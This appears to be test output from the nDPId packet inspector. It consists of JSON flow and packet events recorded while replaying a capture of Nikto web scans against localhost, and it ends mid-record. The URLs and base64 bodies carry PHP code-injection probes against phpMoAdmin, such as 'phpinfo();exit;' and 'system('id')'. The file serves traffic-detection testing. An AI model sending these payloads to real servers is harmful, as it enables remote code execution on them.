00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277974,"pkt":"AAAAAAAAAAAAAAAACABFAAFncRdAAEAGynd\/AAABfwAAAcfQH5DeNEhBp6LH9oAYAED\/WwAAAQEICp1m\/\/2dZv\/9R0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277975,"pkt":"AAAAAAAAAAAAAAAACABFAAFkoPRAAEAGmp1\/AAABfwAAAcfSH5BFc5mo+BaB54AYAED\/WAAAAQEICp1m\/\/+dZv\/\/R0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01128{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277976,"pkt":"AAAAAAAAAAAAAAAACABFAAFfD0hAAEAGLE9\/AAABfwAAAcfUH5ChoTYRo2DY7oAYAED\/UwAAAQEICp1nAACdZwAAR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="}
01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277977,"pkt":"AAAAAAAAAAAAAAAACABFAAFqZD5AAEAG101\/AAABfwAAAcfWH5DMOF1rGOgpBIAYAED\/XgAAAQEICp1nAAGdZwABR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277980,"pkt":"AAAAAAAAAAAAAAAACABFAAFqHXJAAEAGHhp\/AAABfwAAAcfYH5AZXiQoPHeXDoAYAED\/XgAAAQEICp1nAASdZwAER0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277981,"pkt":"AAAAAAAAAAAAAAAACABFAAFn7phAAEAGTPZ\/AAABfwAAAcfaH5CzPtfCPnznp4AYAED\/WwAAAQEICp1nAAWdZwAFR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277983,"pkt":"AAAAAAAAAAAAAAAACABFAAFcKzdAAEAGEGN\/AAABfwAAAcfcH5CIchJjnARiwIAYAED\/UAAAAQEICp1nAAedZwAHR0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="}
01119{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277984,"pkt":"AAAAAAAAAAAAAAAACABFAAFfNJZAAEAGBwF\/AAABfwAAAcfeH5DptA3NjIJEK4AYAED\/UwAAAQEICp1nAAidZwAIR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="}
01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277986,"pkt":"AAAAAAAAAAAAAAAACABFAAFn4zdAAEAGWFd\/AAABfwAAAcfgH5C+u9puvhX1U4AYAED\/WwAAAQEICp1nAAqdZwAKR0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277988,"pkt":"AAAAAAAAAAAAAAAACABFAAFqP5xAAEAG++9\/AAABfwAAAcfiH5DrbgbETTZEsIAYAED\/XgAAAQEICp1nAAudZwALR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9y